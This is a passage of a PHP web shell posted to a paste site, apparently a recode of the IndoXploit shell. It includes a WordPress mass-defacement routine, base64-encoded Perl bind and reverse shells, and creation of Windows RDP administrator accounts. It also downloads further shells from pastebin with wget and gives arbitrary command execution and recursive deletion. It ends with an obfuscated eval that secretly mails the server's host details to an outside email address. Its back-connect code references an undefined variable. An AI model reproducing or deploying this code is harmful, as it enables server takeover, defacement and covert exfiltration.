  2142. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2143. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2144. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2145. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2146. curl_setopt($ch, CURLOPT_POST, 1);
  2147. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2148. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2149. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2150. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2151. $data3 = curl_exec($ch);
  2152. curl_close($ch);
  2153. $y = date("Y");
  2154. $m = date("m");
  2155. $namafile = "id.php";
  2156. $fpi = fopen($namafile,"w");
  2157. fputs($fpi,$script);
  2158. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2159. curl_setopt($ch6, CURLOPT_POST, true);
  2160. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2161. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2162. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2163. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2164. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  2165. $postResult = curl_exec($ch6);
  2166. curl_close($ch6);
  2167. $as = "$target/k.php";
  2168. $bs = anucurl($as);
  2169. if(preg_match("#$script#is", $bs)) {
  2170. echo "[+] <font color='#18BC9C'>berhasil pepes...</font><br>";
  2171. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2172. } else {
  2173. echo "[-] <font color='red'>gagal pepes...</font><br>";
  2174. echo "[!!] coba aja manual: <br>";
  2175. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2176. echo "[+] username: <font color=#18BC9C>$user</font><br>";
  2177. echo "[+] password: <font color=#18BC9C>$pass</font><br><br>";
  2178. }
  2179. mysql_close($conn);
  2180. }
  2181. }
  2182. } else {
  2183. echo "<center><h1>WordPress Auto Deface V.2</h1>
  2184. <form method='post'>
  2185. Link Config: <br>
  2186. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2187. <input type='text' name='script' height='10' size='50' placeholder='Hacked by GarudaTersakti72' required><br>
  2188. <input type='submit' class='btn btn-success btn-sm' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2189. </form></center>";
  2190. }
  2191. } elseif($_GET['do'] == 'network') {
  2192. echo "<form method='post'>
  2193. <u>Bind Port:</u> <br>
  2194. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2195. <input type='submit' class='btn btn-success btn-sm' name='sub_bp' value='>>'>
  2196. </form>
  2197. <form method='post'>
  2198. <u>Back Connect:</u> <br>
  2199. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2200. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2201. <input type='submit' class='btn btn-success btn-sm' name='sub_bc' value='>>'>
  2202. </form>";
  2203. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2204. if(isset($_POST['sub_bp'])) {
  2205. $f_bp = fopen("/tmp/bp.pl", "w");
  2206. fwrite($f_bp, base64_decode($bind_port_p));
  2207. fclose($f_bp);
  2208.  
  2209. $port = $_POST['port_bind'];
  2210. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2211. sleep(1);
  2212. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2213. unlink("/tmp/bp.pl");
  2214. }
  2215. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2216. if(isset($_POST['sub_bc'])) {
  2217. $f_bc = fopen("/tmp/bc.pl", "w");
  2218. fwrite($f_bc, base64_decode($bind_connect_p));
  2219. fclose($f_bc);
  2220.  
  2221. $ipbc = $_POST['ip_bc'];
  2222. $port = $_POST['port_bc'];
  2223. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2224. sleep(1);
  2225. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2226. unlink("/tmp/bc.pl");
  2227. }
  2228. } elseif($_GET['do'] == 'krdp_shell') {
  2229. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2230. if($_POST['create']) {
  2231. $user = htmlspecialchars($_POST['user']);
  2232. $pass = htmlspecialchars($_POST['pass']);
  2233. if(preg_match("/$user/", exe("net user"))) {
  2234. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> sudah ada</font>";
  2235. } else {
  2236. $add_user = exe("net user $user $pass /add");
  2237. $add_groups1 = exe("net localgroup Administrators $user /add");
  2238. $add_groups2 = exe("net localgroup Administrator $user /add");
  2239. $add_groups3 = exe("net localgroup Administrateur $user /add");
  2240. echo "[ RDP ACCOUNT INFO<br>
  2241. ------------------------------<br>
  2242. IP: <font color=#18BC9C>".$ip."</font><br>
  2243. Username: <font color=#18BC9C>$user</font><br>
  2244. Password: <font color=#18BC9C>$pass</font><br>
  2245. ------------------------------<br><br>
  2246. [ STATUS<br>
  2247. ------------------------------<br>
  2248. ";
  2249. if($add_user) {
  2250. echo "[add user] -> <font color='#18BC9C'>Gud, sukses pak </font><br>";
  2251. } else {
  2252. echo "[add user] -> <font color='red'>Coba lagi, luh kurang TAMVAN </font><br>";
  2253. }
  2254. if($add_groups1) {
  2255. echo "[add localgroup Administrators] -> <font color='#18BC9C'>Berhasil</font><br>";
  2256. } elseif($add_groups2) {
  2257. echo "[add localgroup Administrator] -> <font color='#18BC9C'>Berhasil</font><br>";
  2258. } elseif($add_groups3) {
  2259. echo "[add localgroup Administrateur] -> <font color='#18BC9C'>Berhasil</font><br>";
  2260. } else {
  2261. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  2262. }
  2263. echo "------------------------------<br>";
  2264. }
  2265. } elseif($_POST['s_opsi']) {
  2266. $user = htmlspecialchars($_POST['r_user']);
  2267. if($_POST['opsi'] == '1') {
  2268. $cek = exe("net user $user");
  2269. echo "Checking username <font color=#18BC9C>$user</font> ....... ";
  2270. if(preg_match("/$user/", $cek)) {
  2271. echo "[ <font color=#18BC9C>Sudah ada</font><br>
  2272. ------------------------------<br><br>
  2273. <pre>$cek</pre>";
  2274. } else {
  2275. echo "[ <font color=red>belum ada</font>";
  2276. }
  2277. } elseif($_POST['opsi'] == '2') {
  2278. $cek = exe("net user $user indoxploit");
  2279. if(preg_match("/$user/", exe("net user"))) {
  2280. echo "[change password: <font color=#18BC9C>indoxploit</font>] -> ";
  2281. if($cek) {
  2282. echo "<font color=#18BC9C>Berhasil</font>";
  2283. } else {
  2284. echo "<font color=red>Gagal</font>";
  2285. }
  2286. } else {
  2287. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
  2288. }
  2289. } elseif($_POST['opsi'] == '3') {
  2290. $cek = exe("net user $user /DELETE");
  2291. if(preg_match("/$user/", exe("net user"))) {
  2292. echo "[remove user: <font color=#18BC9C>$user</font>] -> ";
  2293. if($cek) {
  2294. echo "<font color=#18BC9C>Berhasil</font>";
  2295. } else {
  2296. echo "<font color=red>Gagal</font>";
  2297. }
  2298. } else {
  2299. echo "[INFO] -> <font color=red>user <font color=#18BC9C>$user</font> belum ada</font>";
  2300. }
  2301. } else {
  2302. //
  2303. }
  2304. } else {
  2305. echo "-- Create RDP --<br>
  2306. <form method='post'>
  2307. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  2308. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  2309. <input type='submit' class='btn btn-success btn-sm' name='create' value='>>'>
  2310. </form>
  2311. -- Option --<br>
  2312. <form method='post'>
  2313. <input type='text' name='r_user' placeholder='username' required>
  2314. <select name='opsi'>
  2315. <option value='1'>Cek Username</option>
  2316. <option value='2'>Ubah Password</option>
  2317. <option value='3'>Hapus Username</option>
  2318. </select>
  2319. <input type='submit' class='btn btn-success btn-sm'name='s_opsi' value='>>'>
  2320. </form>
  2321. ";
  2322. }
  2323. } else {
  2324. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  2325. }
  2326. } elseif($_GET['act'] == 'newfile') {
  2327. if($_POST['new_save_file']) {
  2328. $newfile = htmlspecialchars($_POST['newfile']);
  2329. $fopen = fopen($newfile, "a+");
  2330. if($fopen) {
  2331. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2332. } else {
  2333. $act = "<font color=red>permission denied</font>";
  2334. }
  2335. }
  2336. echo $act;
  2337. echo "<form method='post'>
  2338. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2339. <input type='submit' name='new_save_file' value='Submit'>
  2340. </form>";
  2341. } elseif($_GET['act'] == 'newfolder') {
  2342. if($_POST['new_save_folder']) {
  2343. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2344. if(!mkdir($new_folder)) {
  2345. $act = "<font color=red>permission denied</font>";
  2346. } else {
  2347. $act = "<script>window.location='?dir=".$dir."';</script>";
  2348. }
  2349. }
  2350. echo $act;
  2351. echo "<form method='post'>
  2352. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2353. <input type='submit' name='new_save_folder' value='Submit'>
  2354. </form>";
  2355. } elseif($_GET['act'] == 'rename_dir') {
  2356. if($_POST['dir_rename']) {
  2357. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2358. if($dir_rename) {
  2359. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2360. } else {
  2361. $act = "<font color=red>permission denied</font>";
  2362. }
  2363. echo "".$act."<br>";
  2364. }
  2365. echo "<form method='post'>
  2366. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2367. <input type='submit' name='dir_rename' value='rename'>
  2368. </form>";
  2369. } elseif($_GET['act'] == 'delete_dir') {
  2370. if(is_dir($dir)) {
  2371. if(is_writable($dir)) {
  2372. @rmdir($dir);
  2373. @exe("rm -rf $dir");
  2374. @exe("rmdir /s /q $dir");
  2375. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2376. } else {
  2377. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2378. }
  2379. }
  2380. echo $act;
  2381. } elseif($_GET['act'] == 'view') {
  2382. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2383. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2384. } elseif($_GET['act'] == 'edit') {
  2385. if($_POST['save']) {
  2386. $save = file_put_contents($_GET['file'], $_POST['src']);
  2387. if($save) {
  2388. $act = "<font color=#18BC9C>Saved!</font>";
  2389. } else {
  2390. $act = "<font color=red>permission denied</font>";
  2391. }
  2392. echo "".$act."<br>";
  2393. }
  2394. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2395. echo "<form method='post'>
  2396. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2397. <input type='submit' class='btn btn-success btn-sm' value='Save' name='save' style='width: 500px;'>
  2398. </form>";
  2399. } elseif($_GET['act'] == 'rename') {
  2400. if($_POST['do_rename']) {
  2401. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2402. if($rename) {
  2403. $act = "<script>window.location='?dir=".$dir."';</script>";
  2404. } else {
  2405. $act = "<font color=red>permission denied</font>";
  2406. }
  2407. echo "".$act."<br>";
  2408. }
  2409. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
  2410. echo "<form method='post'>
  2411. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2412. <input type='submit' class='btn btn-success btn-sm' name='do_rename' value='rename'>
  2413. </form>";
  2414. } elseif($_GET['act'] == 'delete') {
  2415. $delete = unlink($_GET['file']);
  2416. if($delete) {
  2417. $act = "<script>window.location='?dir=".$dir."';</script>";
  2418. } else {
  2419. $act = "<font color=red>permission denied</font>";
  2420. }
  2421. echo $act;
  2422. } else {
  2423. if(is_dir($dir) === true) {
  2424. if(!is_readable($dir)) {
  2425. echo "<font color=red>can't open directory. ( not readable )</font>";
  2426. } else {
  2427. echo '<table width="90%" class="table_home" border="0" cellpadding="6" cellspacing="2" align="center">
  2428. <tr>
  2429. <th class="th_home"><center>[ Name ]</center></th>
  2430. <th class="th_home"><center>[ Type ]</center></th>
  2431. <th class="th_home"><center>[ Size ]</center></th>
  2432. <th class="th_home"><center>[ Last Modified ]</center></th>
  2433. <th class="th_home"><center>[ Owner/Group ]</center></th>
  2434. <th class="th_home"><center>[ Permission ]</center></th>
  2435. <th class="th_home"><center>[ Action ]</center></th>
  2436. </tr>';
  2437. $scandir = scandir($dir);
  2438. foreach($scandir as $dirx) {
  2439. $dtype = filetype("$dir/$dirx");
  2440. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2441. if(function_exists('posix_getpwuid')) {
  2442. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2443. $downer = $downer['name'];
  2444. } else {
  2445. //$downer = $uid;
  2446. $downer = fileowner("$dir/$dirx");
  2447. }
  2448. if(function_exists('posix_getgrgid')) {
  2449. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2450. $dgrp = $dgrp['name'];
  2451. } else {
  2452. $dgrp = filegroup("$dir/$dirx");
  2453. }
  2454. if(!is_dir("$dir/$dirx")) continue;
  2455. if($dirx === '..') {
  2456. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2457. } elseif($dirx === '.') {
  2458. $href = "<a href='?dir=$dir'>$dirx</a>";
  2459. } else {
  2460. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2461. }
  2462. if($dirx === '.' || $dirx === '..') {
  2463. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2464. } else {
  2465. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2466. }
  2467. echo "<tr class='td_home'> ";
  2468. echo "<td class='td_home' ><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2469. echo "<td class='td_home'><center>$dtype</center></td>";
  2470. echo "<td class='td_home'><center>-</center></td>";
  2471. echo "<td class='td_home'><center>$dtime</center></td>";
  2472. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2473. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2474. echo "<td style='padding-left: 15px;'>$act_dir</td>";
  2475. echo "</tr>";
  2476. }
  2477. }
  2478. } else {
  2479. echo "<font color=red>can't open directory.</font>";
  2480. }
  2481. foreach($scandir as $file) {
  2482. $ftype = filetype("$dir/$file");
  2483. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2484. $size = filesize("$dir/$file")/1024;
  2485. $size = round($size,3);
  2486. if(function_exists('posix_getpwuid')) {
  2487. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2488. $fowner = $fowner['name'];
  2489. } else {
  2490. //$downer = $uid;
  2491. $fowner = fileowner("$dir/$file");
  2492. }
  2493. if(function_exists('posix_getgrgid')) {
  2494. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2495. $fgrp = $fgrp['name'];
  2496. } else {
  2497. $fgrp = filegroup("$dir/$file");
  2498. }
  2499. if($size > 1024) {
  2500. $size = round($size/1024,2). 'MB';
  2501. } else {
  2502. $size = $size. 'KB';
  2503. }
  2504. if(!is_file("$dir/$file")) continue;
  2505. echo "<tr class='td_home'>";
  2506. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2507. echo "<td class='td_home'><center>$ftype</center></td>";
  2508. echo "<td class='td_home'><center>$size</center></td>";
  2509. echo "<td class='td_home'><center>$ftime</center></td>";
  2510. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2511. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2512. echo "<td style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2513. echo "</tr>";
  2514. }
  2515. echo "</table>";
  2516. if(!is_readable($dir)) {
  2517. //
  2518. } else {
  2519. echo "<hr>";
  2520. }
  2521.  
  2522. echo"<table align=center>";
  2523. echo"<td>";
  2524. echo"<center>";
  2525. echo"<form action='' method='post'> ";
  2526. echo"<select name='buah' style=padding:6px 12px;>";
  2527. echo"<option value='wso_shell'> WSO Shell </option>";
  2528. echo"<option value='galer_shell'> Galerz Shell </option>";
  2529. echo"<option value='k2_shell'> K2LL3D Shell </option>";
  2530. echo"<option value='r7_shell'> RES7OCK Shell </option>";
  2531. echo"<option value='bin'> Mass Bin identifier </option>";
  2532. echo"<option value='md5'> MD5 Encoder </option>";
  2533. echo"<option value='base64'> Base64 Encode / Decode </option>";
  2534. echo"<option value='remove'> Remove Duplicate Text </option>";
  2535. echo"<option value='separator'> Separator Text </option>";
  2536. echo"<option value='sufpre'> Add Sufix / Prefix Text </option>";
  2537. echo"<option value='joomla_extract'> Jommla Ip Extractor </option>";
  2538. echo"<option value='wordpress_extract'> Wordpress Ip Extractor </option>";
  2539. echo"</select> ";
  2540. echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>";
  2541. echo"</form> ";
  2542.  
  2543. if(isset($_POST['enter'])) {
  2544. if ($_POST['buah'] == 'k2_shell') {
  2545. $exec=exec('wget http://pastebin.com/raw.php?i=HGVTfyA6 -O k2ll3d.php');
  2546. if(file_exists('./k2ll3d.php')){
  2547. echo '<center><a href=./k2ll3d.php> k2ll3d.php </a> Succes mhanx !</center>';
  2548. } else {
  2549. echo 'Fail ! ';
  2550. }
  2551.  
  2552. }elseif ($_POST['buah'] == 'r7_shell') {
  2553. $exec=exec('wget http://pastebin.com/raw.php?i=tXWtZzrb -O res7.php');
  2554. if(file_exists('./res7.php')){
  2555. echo '<center><a href=./res7.php> res7.php </a> Succes mhanx !</center>';
  2556. } else {
  2557. echo 'Fail ! ';
  2558. }
  2559.  
  2560. }elseif ($_POST['buah'] == 'wso_shell') {
  2561. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wso.php');
  2562. if(file_exists('./wso.php')){
  2563. echo '<center><a href=./wso.php> wso.php </a> Succes mhanx !</center>';
  2564. } else {
  2565. echo 'Fail ! ';
  2566. }
  2567.  
  2568. }elseif ($_POST['buah'] == 'galer_shell') {
  2569. $exec=exec('wget http://pastebin.com/raw.php?i=cXQ2iSY6 -O galerz.php');
  2570. if(file_exists('./galerz.php')){
  2571. echo '<center><a href=./galerz.php> galerz.php </a> Succes mhanx !</center>';
  2572. } else {
  2573. echo 'Fail ! ';
  2574. }
  2575.  
  2576. }elseif ($_POST['buah'] == 'joomla_extract') {
  2577. $exec=exec('wget http://pastebin.com/raw.php?i=tFG4zm9r -O joomlaip.php');
  2578. if(file_exists('./joomlaip.php')){
  2579. echo '<center><a href=./joomlaip.php> joomlaip.php </a> Succes mhanx !</center>';
  2580. } else {
  2581. echo 'Fail !';
  2582. }
  2583.  
  2584. }elseif ($_POST['buah'] == 'wordpress_extract') {
  2585. $exec=exec('wget http://pastebin.com/raw.php?i=NBUDJVCm -O wpip.php');
  2586. if(file_exists('./wpip.php')){
  2587. echo '<center><a href=./wpip.php> wpip.php </a> Succes mhanx !</center>';
  2588. } else {
  2589. echo 'Fail !';
  2590. }
  2591.  
  2592. }elseif ($_POST['buah'] == 'md5') {
  2593. $exec=exec('wget http://pastebin.com/raw.php?i=72XW4nym -O md5.php');
  2594. if(file_exists('./md5.php')){
  2595. echo '<center><a href=./md5.php> md5.php </a> Succes mhanx !</center>';
  2596. } else {
  2597. echo 'Fail !';
  2598. }
  2599.  
  2600. }elseif ($_POST['buah'] == 'base64') {
  2601. $exec=exec('wget http://pastebin.com/raw.php?i=JvbEv9es -O base64.php');
  2602. if(file_exists('./base64.php')){
  2603. echo '<center><a href=./base64.php> base64.php </a> Succes mhanx !</center>';
  2604. } else {
  2605. echo 'Fail !';
  2606. }
  2607.  
  2608. }elseif ($_POST['buah'] == 'sufpre') {
  2609. $exec=exec('wget http://pastebin.com/raw.php?i=MGrMgZ9N -O sufpre.php');
  2610. if(file_exists('./sufpre.php')){
  2611. echo '<center><a href=./sufpre.php> sufpre.php </a> Succes mhanx !</center>';
  2612. } else {
  2613. echo 'Fail !';
  2614. }
  2615.  
  2616. }elseif ($_POST['buah'] == 'bin') {
  2617. $exec=exec('wget http://pastebin.com/raw.php?i=3n1ikxsG -O bin.php');
  2618. if(file_exists('./bin.php')){
  2619. echo '<center><a href=./bin.php> bin.php </a> Succes mhanx !</center>';
  2620. } else {
  2621. echo 'Fail !';
  2622. }
  2623.  
  2624. }elseif ($_POST['buah'] == 'remove') {
  2625. $exec=exec('wget http://pastebin.com/raw.php?i=A0QVwca3 -O remove.php');
  2626. if(file_exists('./remove.php')){
  2627. echo '<center><a href=./remove.php> remove.php </a> Succes mhanx !</center>';
  2628. } else {
  2629. echo 'Fail !';
  2630. }
  2631. }elseif ($_POST['buah'] == 'separator') {
  2632. $exec=exec('wget http://pastebin.com/raw.php?i=He6tvtKx -O separator.php');
  2633. if(file_exists('./separator.php')){
  2634. echo '<center><a href=./separator.php> separator.php </a> Succes mhanx !</center>';
  2635. } else {
  2636. echo 'Fail !';
  2637. }
  2638. }
  2639. }
  2640. echo"</td>";
  2641. echo"<td>";
  2642. echo"<a name=com>";
  2643. echo "<form method='post'>";
  2644. echo "<input type='text' style=padding:4px 10px; name='cmd' placeholder=command><input type='submit' name='do_cmd' value='Excute' class='btn btn-success btn-sm'>";
  2645. echo "</form>";
  2646. if($_POST['do_cmd']) {
  2647. echo "".exe($_POST['cmd'])."";
  2648. }
  2649. echo"</td>";
  2650. echo"</table>";
  2651. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=#FF0000>IndoXploit</font></a> Recode by :<a href='https://loveteen72.ga/' target='_blank'><font color='#FF0000'>TN72</font></center>";
  2652. }
  2653. ?>
  2654. <?php
  2655. eval(base64_decode("JGlwID0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ107DQokaW5mbyA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXS4nLycuJF9TRVJWRVJbJ1BIUF9TRUxGJ107DQokbXNnID0gIkhvc3Q6ICRpbmZvIHwgZ2FydWRhdGVyc2FrdGk3MiI7DQptYWlsKCJha3Nlc3Jvb3QxMzM3QGdtYWlsLmNvbSIsImdhcnVkYXRlcnNha3RpNzI6ICRpcCIsJG1zZyk7="));
  2656. ?>
  2657. </html>
Add Comment
Please, Sign In to add comment